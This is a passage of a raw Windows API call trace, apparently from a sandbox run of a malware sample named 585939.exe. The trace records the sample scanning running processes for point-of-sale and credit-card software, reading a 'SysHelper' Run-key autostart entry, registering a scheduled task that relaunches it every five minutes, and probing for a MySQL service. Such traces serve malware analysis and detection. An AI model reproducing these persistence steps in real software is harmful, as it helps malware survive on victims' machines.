[0121.750] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x230000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0121.750] CloseHandle (hObject=0x5a4) returned 1 [0121.750] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f0) returned 0x5a4 [0121.750] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.752] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1370000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0121.752] CloseHandle (hObject=0x5a4) returned 1 [0121.752] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x5a4 [0121.752] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.753] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x240000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0121.753] CloseHandle (hObject=0x5a4) returned 1 [0121.753] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x5a4 [0121.753] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.754] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xeb0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0121.755] CloseHandle (hObject=0x5a4) returned 1 [0121.755] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x5a4 [0121.755] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.756] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa90000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0121.756] CloseHandle (hObject=0x5a4) returned 1 [0121.756] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x5a4 [0121.756] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.757] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x12d0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0121.758] CloseHandle (hObject=0x5a4) returned 1 [0121.758] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x940) returned 0x5a4 [0121.758] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.759] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0121.760] CloseHandle (hObject=0x5a4) returned 1 [0121.760] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x950) returned 0x5a4 [0121.760] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.761] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1b0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0121.761] CloseHandle (hObject=0x5a4) returned 1 [0121.761] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x960) returned 0x5a4 [0121.761] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.763] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x340000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0121.763] CloseHandle (hObject=0x5a4) returned 1 [0121.764] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x5a4 [0121.764] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.765] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9b0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0121.765] CloseHandle (hObject=0x5a4) returned 1 [0121.765] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x5a4 [0121.765] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.767] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x12a0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0121.767] CloseHandle (hObject=0x5a4) returned 1 [0121.767] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x5a4 [0121.767] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.768] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1080000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0121.769] CloseHandle (hObject=0x5a4) returned 1 [0121.769] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x5a4 [0121.769] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.770] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf60000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0121.771] CloseHandle (hObject=0x5a4) returned 1 [0121.771] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x5a4 [0121.771] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.772] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8f0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0121.772] CloseHandle (hObject=0x5a4) returned 1 [0121.772] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae8) returned 0x5a4 [0121.773] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.774] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xdf0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="alloy dans.exe") returned 0xe [0121.774] CloseHandle (hObject=0x5a4) returned 1 [0121.774] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf8) returned 0x5a4 [0121.774] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.775] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x12c0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="bible_wiley_seminars.exe") returned 0x18 [0121.776] CloseHandle (hObject=0x5a4) returned 1 [0121.776] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb08) returned 0x5a4 [0121.776] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.777] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1030000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="publishedarmstrongdarwin.exe") returned 0x1c [0121.778] CloseHandle (hObject=0x5a4) returned 1 [0121.778] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb18) returned 0x5a4 [0121.778] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.779] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xfe0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="mv-times.exe") returned 0xc [0121.779] CloseHandle (hObject=0x5a4) returned 1 [0121.780] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb28) returned 0x5a4 [0121.780] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.781] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1030000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="expressmsie.exe") returned 0xf [0121.781] CloseHandle (hObject=0x5a4) returned 1 [0121.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x0 [0121.781] CloseHandle (hObject=0x0) returned 0 [0121.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc4) returned 0x0 [0121.781] CloseHandle (hObject=0x0) returned 0 [0121.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x82c) returned 0x0 [0121.782] CloseHandle (hObject=0x0) returned 0 [0121.782] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x270) returned 0x0 [0121.782] CloseHandle (hObject=0x0) returned 0 [0121.782] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x748) returned 0x0 [0121.782] CloseHandle (hObject=0x0) returned 0 [0121.782] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c0) returned 0x0 [0121.782] CloseHandle (hObject=0x0) returned 0 [0121.782] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x958) returned 0x5a4 [0121.782] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0121.783] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x400000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="585939.exe") returned 0xa [0121.784] CloseHandle (hObject=0x5a4) returned 1 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x649bb0 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32421b8 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32557e0 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3231ed8 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3232140 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322a0d8 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322a340 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322a5a8 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322a810 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322aa78 [0121.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322ace0 [0121.802] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d850 | out: phkResult=0x18d850*=0x5a4) returned 0x0 [0121.802] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d84c, lpData=0x18bf78, lpcbData=0x18d830*=0x400 | out: lpType=0x18d84c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe\" --AutoStart", lpcbData=0x18d830*=0xd4) returned 0x0 [0121.802] RegCloseKey (hKey=0x5a4) returned 0x0 [0121.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3255bf0 [0121.802] lstrlenA (lpString="\" --AutoStart") returned 13 [0121.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x3225cb8 [0121.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3255bf0 | out: hHeap=0x620000) returned 1 [0121.802] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe") returned 1 [0121.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x3225d80 [0121.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3225cb8 | out: hHeap=0x620000) returned 1 [0121.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x3225cb8 [0121.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x3225e48 [0121.803] CoInitialize (pvReserved=0x0) returned 0x0 [0121.816] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0121.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x3225f10 [0121.816] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d83c | out: ppv=0x18d83c*=0x29508b8) returned 0x0 [0121.824] TaskScheduler:ITaskService:Connect (This=0x29508b8, serverName=0x18d2c8*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x5f, varVal2=0xc0), user=0x18d2d8*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xc8), domain=0x18d2e8*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), password=0x18d2f8*(varType=0x0, wReserved1=0x322, wReserved2=0xd7e4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x620000)) returned 0x0 [0121.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228be8 [0121.827] TaskScheduler:ITaskService:GetFolder (in: This=0x29508b8, Path="\\", ppFolder=0x18d844 | out: ppFolder=0x18d844*=0x2950920) returned 0x0 [0121.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228be8 | out: hHeap=0x620000) returned 1 [0121.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228be8 [0121.830] ITaskFolder:DeleteTask (This=0x2950920, Name="Time Trigger Task", flags=0) returned 0x0 [0121.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228be8 | out: hHeap=0x620000) returned 1 [0121.884] TaskScheduler:ITaskService:NewTask (in: This=0x29508b8, flags=0x0, ppDefinition=0x18d848 | out: ppDefinition=0x18d848*=0x2950950) returned 0x0 [0121.884] TaskScheduler:IUnknown:Release (This=0x29508b8) returned 0x1 [0121.884] ITaskDefinition:get_RegistrationInfo (in: This=0x2950950, ppRegistrationInfo=0x18d81c | out: ppRegistrationInfo=0x18d81c*=0x2950a10) returned 0x0 [0121.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.884] IRegistrationInfo:put_Author (This=0x2950a10, Author="Author Name") returned 0x0 [0121.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.885] IUnknown:Release (This=0x2950a10) returned 0x1 [0121.885] ITaskDefinition:get_Principal (in: This=0x2950950, ppPrincipal=0x18d824 | out: ppPrincipal=0x18d824*=0x2950ba0) returned 0x0 [0121.885] IPrincipal:put_LogonType (This=0x2950ba0, LogonType=3) returned 0x0 [0121.885] IUnknown:Release (This=0x2950ba0) returned 0x1 [0121.885] ITaskDefinition:get_Settings (in: This=0x2950950, ppSettings=0x18d82c | out: ppSettings=0x18d82c*=0x2950ac0) returned 0x0 [0121.885] ITaskSettings:put_StartWhenAvailable (This=0x2950ac0, StartWhenAvailable=1) returned 0x0 [0121.885] IUnknown:Release (This=0x2950ac0) returned 0x1 [0121.885] ITaskSettings:get_IdleSettings (in: This=0x2950ac0, ppIdleSettings=0x18d810 | out: ppIdleSettings=0x18d810*=0x2950b30) returned 0x0 [0121.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.885] IIdleSettings:put_WaitTimeout (This=0x2950b30, WaitTimeout="PT5M") returned 0x0 [0121.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.885] IUnknown:Release (This=0x2950b30) returned 0x1 [0121.885] ITaskDefinition:get_Triggers (in: This=0x2950950, ppTriggers=0x18d80c | out: ppTriggers=0x18d80c*=0x2950a80) returned 0x0 [0121.885] ITriggerCollection:Create (in: This=0x2950a80, Type=1, ppTrigger=0x18d818 | out: ppTrigger=0x18d818*=0x2950c00) returned 0x0 [0121.886] IUnknown:Release (This=0x2950a80) returned 0x1 [0121.886] IUnknown:QueryInterface (in: This=0x2950c00, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d834 | out: ppvObject=0x18d834*=0x2950c00) returned 0x0 [0121.886] IUnknown:Release (This=0x2950c00) returned 0x2 [0121.886] ITrigger:get_Repetition (in: This=0x2950c00, ppRepeat=0x18d820 | out: ppRepeat=0x18d820*=0x2950c50) returned 0x0 [0121.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.886] IRepetitionPattern:put_Interval (This=0x2950c50, Interval="PT5M") returned 0x0 [0121.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.886] IRepetitionPattern:put_Duration (This=0x2950c50, Duration="") returned 0x0 [0121.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.886] ITrigger:put_Repetition (This=0x2950c00, Repetition=0x2950c50) returned 0x0 [0121.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.886] ITrigger:put_Id (This=0x2950c00, Id="Trigger1") returned 0x0 [0121.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.886] ITrigger:put_EndBoundary (This=0x2950c00, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0121.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d2f4 | out: lpSystemTimeAsFileTime=0x18d2f4*(dwLowDateTime=0xc09921f0, dwHighDateTime=0x1d62438)) [0121.893] GetLastError () returned 0x0 [0121.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x324b690 [0121.893] GetLastError () returned 0x0 [0121.900] GetLastError () returned 0x0 [0121.908] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x1 [0121.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d25c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d25c) returned 26 [0121.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d25c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d25c) returned 26 [0121.945] GetLastError () returned 0x0 [0121.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x324b510 [0121.945] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x324b510, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0121.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x677cd0 [0121.945] GetLastError () returned 0x0 [0121.945] ITrigger:put_StartBoundary (This=0x2950c00, StartBoundary="2020-05-07T16:30:21") returned 0x0 [0121.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3217530 | out: hHeap=0x620000) returned 1 [0121.945] IUnknown:Release (This=0x2950c00) returned 0x1 [0121.946] ITaskDefinition:get_Actions (in: This=0x2950950, ppActions=0x18d828 | out: ppActions=0x18d828*=0x29509c8) returned 0x0 [0121.946] IActionCollection:Create (in: This=0x29509c8, Type=0, ppAction=0x18d814 | out: ppAction=0x18d814*=0x2950c98) returned 0x0 [0121.946] IUnknown:Release (This=0x29509c8) returned 0x1 [0121.946] IUnknown:QueryInterface (in: This=0x2950c98, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d830 | out: ppvObject=0x18d830*=0x2950c98) returned 0x0 [0121.946] IUnknown:Release (This=0x2950c98) returned 0x2 [0121.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.946] IExecAction:put_Path (This=0x2950c98, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\45df4fd3-2e0d-4883-810e-1f70f9babe97\\585939.exe") returned 0x0 [0121.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.946] IExecAction:put_Arguments (This=0x2950c98, Arguments="--Task") returned 0x0 [0121.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0121.946] IUnknown:Release (This=0x2950c98) returned 0x1 [0121.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3228c30 [0121.947] ITaskFolder:RegisterTaskDefinition (in: This=0x2950920, Path="Time Trigger Task", pDefinition=0x2950950, flags=6, UserId=0x18d2d0*(varType=0x0, wReserved1=0x322, wReserved2=0xd7e4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x620000), password=0x18d2e0*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), LogonType=3, sddl=0x18d2f4*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xc8), ppTask=0x18d7fc | out: ppTask=0x18d7fc*=0x2950d18) returned 0x0 [0122.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3228c30 | out: hHeap=0x620000) returned 1 [0122.026] TaskScheduler:IUnknown:Release (This=0x2950920) returned 0x0 [0122.026] TaskScheduler:IUnknown:Release (This=0x2950950) returned 0x0 [0122.026] IUnknown:Release (This=0x2950d18) returned 0x0 [0122.026] CoUninitialize () [0122.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3225f10 | out: hHeap=0x620000) returned 1 [0122.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3225e48 | out: hHeap=0x620000) returned 1 [0122.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3225cb8 | out: hHeap=0x620000) returned 1 [0122.027] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x677048 [0122.027] OpenServiceW (hSCManager=0x677048, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3222d90 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322af48 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x322b1b0 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3216d00 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3216f68 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32171d0 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3217438 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32444a0 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3244708 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3244970 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3244bd8 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3244e40 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32450a8 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3245310 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3245578 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x32457e0 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3245a48 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x677cd0 [0122.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x110) returned 0x31ec580 [0122.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x677cd0 | out: hHeap=0x620000) returned 1 [0122.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x110) returned 0x31f78d8 [0122.029] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x3228fd0, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0xb34) returned 0x5b4 [0122.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31ec580 | out: hHeap=0x620000) returned 1 [0122.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x324b510 [0122.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x3245cb0 [0122.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 